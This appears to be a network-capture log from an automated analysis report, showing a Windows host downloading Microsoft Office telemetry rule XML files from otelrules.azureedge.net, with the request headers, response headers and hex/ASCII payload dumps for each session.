2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:58 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:12:59 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:58 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031258Z-16547b76f7f22sh5hC1DFWyb4w00000007eg00000000dhcx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:12:59 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:58 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:00 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: d78ce712-d01e-007a-194f-2ef38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031300Z-15869dbbcc62nmdhhC1DFWg2r400000000wg000000003g1c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:58 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:12:59 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:58 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 7513f58e-b01e-005c-2901-2d4c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031258Z-16547b76f7fcjqqhhC1DFWrrrc00000007k0000000009261 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:12:59 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:58 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:12:59 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:58 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031258Z-16547b76f7f9rdn9hC1DFWfk7s00000007gg00000000dahg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:12:59 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:59 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:12:59 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:59 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 5dfad506-901e-0029-2a46-2e274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031259Z-15869dbbcc6khw88hC1DFWbb20000000010g00000000mqzm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:12:59 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:59 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:59 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031259Z-16547b76f7fcrtpchC1DFW52e800000007f000000000u66e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:59 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:59 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031259Z-16547b76f7fmbrhqhC1DFWkds800000007q00000000029nh x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:59 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:59 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: c8bf6ef5-601e-00ab-06f0-2e66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031259Z-17df447cdb5vp9l9hC1DFW0nrw00000004000000000046xt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:59 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:59 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031259Z-16547b76f7f9rdn9hC1DFWfk7s00000007eg00000000nppd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" 